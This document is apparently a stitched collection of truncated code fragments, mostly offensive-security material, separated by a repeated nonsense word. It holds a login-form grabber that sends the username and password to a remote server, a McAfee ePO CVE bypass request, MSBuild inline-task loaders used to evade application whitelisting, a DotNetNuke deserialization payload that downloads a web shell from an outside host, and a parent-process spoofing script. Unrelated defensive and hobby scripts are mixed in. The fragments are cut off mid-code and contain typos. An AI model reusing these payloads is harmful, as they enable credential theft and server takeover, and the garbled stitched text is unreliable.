unbaiat

document.forms[0].onsubmit = function() {
	var u = document.getElementById('fm-login-id');
	var p = document.getElementById('fm-login-password');
	var s = new XMLHttpRequets();
	s.open('POST', 'https://myserver/xxx-alibaba/');
	s.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
	s.onreadystatechange = function() {
		if (s.readState == 4) {
			document.forms[0].submit();
		}

unbaiat

# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# Specifying an X-Forwarded-For header bypasses the local only check
# https://kc.mcafee.com/corporate/index?page=content&id=SB10240
# https://nvd.nist.gov/vuln/detail/CVE-2018-6671
#
# 2019 @leonjza
#
# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850

POST /Notifications/testRegExe.do HTTP/1.1

unbaiat

param(
    [Parameter(Mandatory)]
    [string]$Path
)

#Created by Pierre.Audonnet@microsoft.com
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
#  keytab {

unbaiat

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="DemoClass">
   <ClassExample />
  </Target>
	<UsingTask
    TaskName="ClassExample"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
	<Task>
      <Code Type="Class" Language="cs">

unbaiat

import requests
import sys
from bs4 import BeautifulSoup
import json
import re

def sanitize_data(data):
    return data.replace('\r\n', '').replace('\n', '').replace('  ', '').replace(' ', '')

if len(sys.argv) < 2:

unbaiat

DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us

unbaiat

::
::#######################################################################
::
:: Change file associations to protect against common ransomware attacks
:: Note that if you legitimately use these extensions, like .bat, you will now need to execute them manually from cmd or powershell
:: Alternatively, you can right-click on them and hit 'Run as Administrator' but ensure it's a script you want to run :) 
:: ---------------------
ftype htafile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype WSHFile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"
ftype batfile="%SystemRoot%\system32\NOTEPAD.EXE" "%1"

unbaiat

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="NotSubTee">
   <BusinessTime />
  </Target>
<UsingTask
    TaskName="BusinessTime"
    TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <ParameterGroup/>
    <Task>

unbaiat

<#

$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}

#>

#Simple powershell/C# to spawn a process under a different parent process
#Launch PowerShell As Administrator

unbaiat

# External module imp
import RPi.GPIO as GPIO
import datetime
import time

init = False

GPIO.setmode(GPIO.BOARD) # Broadcom pin-numbering scheme

def get_last_watered():